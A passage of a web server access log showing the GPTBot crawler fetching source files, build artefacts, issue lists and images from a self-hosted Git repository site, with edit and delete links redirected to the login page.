AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17055] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17055] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=all&type=all" +[17/Feb/2026:17:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=all&type=all" +[17/Feb/2026:17:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17056] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17055] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17056] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17054] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11322] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:17:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11326] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:17:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:17:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11321] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:17:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2flocalpycs%2fpyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 19805] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:17:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2flocalpycs%2fpyimod01_archive.pyc" [Client 74.7.227.38] [Length 19802] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:17:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11416] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=all&type=all" +[17/Feb/2026:17:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9792] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 11122] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 11099] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 11060] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:17:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&sort=oldest&state=all&type=all" +[17/Feb/2026:17:32:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:32:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:32:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:32:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:32:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png" +[17/Feb/2026:17:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom7.png" +[17/Feb/2026:17:32:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:32:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 